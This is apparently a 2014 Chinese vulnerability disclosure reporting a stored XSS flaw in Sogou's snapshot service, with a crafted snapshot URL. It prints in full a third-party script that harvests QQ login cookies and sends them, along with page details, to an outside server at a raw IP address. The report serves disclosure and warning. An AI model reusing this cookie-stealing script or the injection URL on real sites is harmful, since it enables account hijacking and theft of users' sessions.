漏洞概要 关注数(11) 关注此漏洞
漏洞标题: 搜狗快照存在持久型xss漏洞
相关厂商: 搜狗
提交时间: 2014-07-25 11:00
公开时间: 2014-07-30 11:02
漏洞类型: xss跨站脚本攻击
危害等级: 中
自评Rank: 10
漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞
漏洞详情
披露状态:
2014-07-25: 细节已通知厂商并且等待厂商处理中
2014-07-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
搜狗快照存储型xss 危害你懂得!
详细说明:
如:
http://www.sogou.com//websnapshot?ie=utf8&url=http%3A%2F%2Fqq.mb5u.com%2Fabout.html&did=65b505059bf9e58d-1152efedfc5effe9-134fa5d0b31d02dc09750e547cb02b87&k=fd2b0d13138196abc9b801bca9d59b27&encodedQuery=&query=qq.mb5u.com%2Fabout.html&&pid=sogou-wsse-7535bbb91c8fde34&duppid=1&w=01020400&m=0&st=0&uid=1250&ref=&furl=http%3A%2F%2Ftongjige.com%2F&title=%E7%BB%9F%E8%AE%A1%E5%93%A5_%E8%90%A5%E9%94%80%E7%8E%8B_%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1-%E8%AE%BF%E5%AE%A2QQ%E6%8A%93%E5%8F%96--%E8%AE%BF%E5%AE%A2QQ%E6%8F%90%E5%8F%96-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E6%8A%93%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E8%8E%B7%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E6%8F%90%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E7%BB%9F%E8%AE%A1QQ%E7%B3%BB%E7%BB%9F%E6%BA%90%E7%A0%81%7C%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1%7CQQ%E8%AE%BF%E5%AE%A2%E7%BB%9F%E8%AE%A1
查看源码

漏洞证明:
解密
http://qq.mb5u.com/qq.js 是盗取cookie的
var u1 = Gc5u('pt2gguin');
var u2 = Gc5u('o_cookie');
var u3 = Gc5u('p_uin');
var u4 = Gc5u('uin');
var u5 = Gc5u('ptui_loginuin');
var u6 = Gc5u('uin_cookie');
var u7 = Gc5u('luin');
var u8 = Gc5u('qm_username');
var quin = u1 || u2 || u3 || u4 || u5 || u6 || u7 || u8;
if (quin == null) {
var b = 'http://42.120.11.238:8888/m/wdl.php?c=' + Re5u('fkid') + '&d=1'
var a = document.createElement('script');
a.type = 'text/javascript';
a.charset = 'utf-8';
a.src = b;
document.getElementsByTagName('HEAD').item(0).appendChild(a)
} else {
var auin = [
u1,
u2,
u3,
u4,
u5,
u6,
u7,
u8
];
var buin = [
];
var cuin = [
];
var uq = {
};
for (var i = 0; i < auin.length; i++) {
if (auin[i] != null) {
var a = auin[i].replace(/^[o|0]*/gi, '');
buin.push(a)
}
}
for (var i = 0; i < buin.length; i++) {
if (!uq[buin[i]]) {
uq[buin[i]] = true;
if (parseInt(buin[i]) > 10051) {
cuin.push(buin[i])
}
}
}
cuin = cuin.reverse();
for (var i = 0; i < cuin.length; i++) {
var a = cuin[i]
var b = Re5u('uid');
var c = Re5u('ref');
var d = Re5u('furl');
var e = Re5u('title');
var f = 'http://42.120.11.238:8888/?action=saveQQ';
f += '&qq=' + a;
f += '&uid=' + b;
f += '&referrer=' + c;
f += '&url=' + d;
f += '&title=' + e;
f += '&r=' + (new Date()).getTime();
var g = document.createElement('script');
g.type = 'text/javascript';
g.src = f;
document.getElementsByTagName('HEAD').item(0).appendChild(g)
}
}
function Gc5u(a) {//传一个字符串以看cookie中是否有a(变量)
var b,
reg = new RegExp('(^| )' + a + '=([^;]*)(;|$)'); //创建正则表达式
if (b = document.cookie.match(reg)) //传一个字符串以|;|隔开变量,看cookie中是否有a(变量)
{
return unescape(b[2]); //有就取值返回
} else {
return null
}
}
function Re5u(a) {
var b = document.location.href;
var c = b.substring(b.indexOf('?') + 1).split('&');
for (var i = 0; i < c.length; i++) {
var d = c[i].indexOf(a + '=');
if (d != - 1) {
return c[i].replace(a + '=', '').replace('?', '');
break
}
}
return ''
}
何止是QQ cookie都够登录很多东西了吧 上你的QQ发几个广告是没问题了的,所以纠正一下 不是你的QQ号中毒了只是cookie被盗取了发几个小广告而已!发现帐号被莫名其妙发广告什么的就赶紧改密码吧亲。。。。
发表评论
全部评论 / 4